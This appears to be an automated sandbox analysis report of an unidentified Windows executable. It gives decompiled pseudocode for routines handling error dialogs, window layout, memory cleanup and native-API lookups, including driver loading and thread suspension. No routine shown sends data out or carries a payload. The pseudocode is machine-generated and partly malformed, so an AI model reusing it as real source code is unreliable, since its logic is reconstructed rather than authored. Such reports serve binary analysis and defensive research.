"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

0x004068ec
0x004068f0
0x004068f4
0x004068ff
0x00406902
0x0040690a
0x00406910
0x00406911
0x0040691b
0x0040691e
0x00406923
0x0040692d
0x0040692e
0x00406933
0x0040693d
0x00406940
0x00406949
0x0040694a
0x00406950
0x00406956
0x00406959
0x0040695c
0x00406964
0x0040696d
0x00406974
0x0040697e
0x00406989
0x00406990
0x00406998
0x0040699b
0x0040699f
0x004069b8
0x004069bc
0x004069c4
0x004069c7
0x004069c7
0x004069cb
0x004069ce
0x004069d4
0x004069d4
0x004069d9
0x004069df
0x004069e6
0x004069ea
0x004069ef
0x004069f2
0x004069f5
0x00406a00
0x00406a01
0x00406a06
0x00406a08
0x00406a0b
0x00406a10
0x00406a16
0x00406a25
0x00406a25
0x00406a18
0x00406a1e
0x00406a1e
0x00406a27
0x00406a2f
0x00406a32
0x00406a35
0x00406a3b
0x00406a41
0x00406a47
0x00406a4d
0x00406a53
0x00406a5d
0x00406a6d

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

0x004097b1
0x004097b9
0x004097bb
0x004097be
0x004097c3
0x004097ca
0x004097de
0x004097de
0x004097e3
0x004097e5
0x004097e5
0x004097ec
0x004097f3
0x004097f6
0x004097fe
0x00409802
0x00409805
0x0040980a
0x0040980d
0x00409810
0x00409822
0x00000000
0x00409827
0x0040982a
0x004098da
0x004098da
0x004098dc
0x004098e0
0x004098e9
0x004098ec
0x004098f6
0x004098f6
0x004098e2
0x00000000
0x004098e2
0x00409830
0x00409833
0x00409838
0x0040983b
0x0040983e
0x0040985f
0x0040985f
0x00409861
0x00409863
0x0040989e
0x004098b1
0x004098b8
0x004098c0
0x004098c5
0x004098d5
0x00409865
0x00409865
0x00409865
0x0040986c
0x00409878
0x0040987f
0x0040988a
0x0040988f
0x0040988f
0x0040986c
0x00000000
0x00409863
0x00409840
0x00409843
0x00409846
0x0040984b
0x00409852
0x00000000
0x00000000
0x00409854
0x0040985d
0x00000000
0x00000000
0x00000000
0x0040985d
0x00409894
0x00000000
0x00409894

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

0x004067ac
0x004067af
0x004067b5
0x004067ba
0x004067bf
0x004067c1
0x004067c6
0x004067c7
0x004067cc
0x004067cd
0x004067d2
0x004067d4
0x004067d9
0x004067da
0x004067df
0x004067e0
0x004067e5
0x004067e7
0x004067ec
0x004067ed
0x004067f2
0x004067f3
0x004067f8
0x004067fa
0x004067ff
0x00406800
0x00406805
0x00406806
0x00406808
0x0040680f
0x00406810
0x00406812
0x00406817
0x0040681e
0x00406828
0x0040682b
0x0040682c
0x0040681e
0x00406835
0x00406839
0x00406841

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

0x004083dc
0x004083e2
0x004083e9
0x004083ea
0x004083eb
0x004083f3
0x004083f6
0x004083f8
0x00408401
0x00408404
0x00408407
0x00408409
0x0040840c
0x00408413
0x0040841d
0x00408427
0x0040842c
0x0040842f
0x00408432
0x00408435
0x00408438
0x00408439
0x0040843e
0x0040843f
0x00408442
0x0040844a

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

0x00406746
0x00406746
0x0040674f
0x00406751
0x00406752
0x00406757
0x00406758
0x0040675d
0x0040675f
0x00406760
0x00406765
0x00406766
0x0040676e
0x00406770
0x00406771
0x00406776
0x00406777
0x0040677f
0x00406781
0x00406785
0x00406787
0x00406788
0x0040678e
0x0040678e
0x00406790
0x00406791
0x00406796
0x00406798
0x0040679e
0x004067a1
0x004067a4
0x004067ab

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

0x0040aba8
0x0040aba9
0x0040abb0
0x0040abb2
0x0040abb5
0x0040ac19
0x0040ac2c
0x0040ac2e
0x0040ac36
0x0040ac39
0x0040ac39
0x0040ac1b
0x0040ac21
0x0040ac21
0x0040abb7
0x0040abcb
0x0040abce
0x0040abd7
0x0040abe6
0x0040abf6
0x0040abfe
0x0040ac09
0x0040ac0f
0x0040ac12
0x0040ac4f

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
